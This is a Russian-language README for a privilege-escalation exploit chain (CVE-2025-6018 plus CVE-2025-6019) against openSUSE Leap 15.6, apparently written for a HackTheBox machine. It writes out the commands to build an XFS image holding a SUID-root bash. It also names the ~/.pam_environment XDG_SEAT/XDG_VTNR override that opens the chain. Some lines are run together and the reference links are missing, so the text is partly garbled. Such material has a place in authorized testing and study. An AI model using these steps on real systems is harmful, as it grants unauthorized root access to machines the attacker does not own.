
Цепочка эксплойтов для повышения привилегий (CVE-2025-6018 + CVE-2025-6019) для openSUSE Leap 15.6
Этот эксплойт был разработан для решения задания HackTheBox, нацеленного на openSUSE Leap 15.6.
Данный эксплойт основан на оригинальном исследовании команды Qualys Security:
Дополнительная эталонная реализация:
Данный эксплойт объединяет две уязвимости для достижения локального повышения привилегий от непривилегированного пользователя до root на openSUSE Leap 15.6:
Эксплойт требует предварительно созданный образ файловой системы XFS, содержащий SUID-бинарник bash. Это должно быть создано на Linux-машине, где у вас есть привилегии root:
dd if=/dev/zero of=xfs.image bs=1M count=400
mkfs.xfs xfs.image
mkdir -p /tmp/mnt
mount xfs.image /tmp/mnt
cp /bin/bash /tmp/mnt/bash
chmod 04755 /tmp/mnt/bash
umount /tmp/mnt
Проверьте, что образ создан правильно:
file xfs.image
# Should output: "SGI XFS filesystem data (blksz 4096, inosz 256, v2 dirs)"
~/.pam_environment с переопределениями XDG_SEAT и XDG_VTNRЕсли эксплойт не срабатывает:
file xfs.imagesystemctl status udisks2Данный эксплойт предназначен только для образовательных целей и авторизованного тестирования безопасности. Используйте ответственно и только на системах, на которые у вас есть разрешение на тестирование.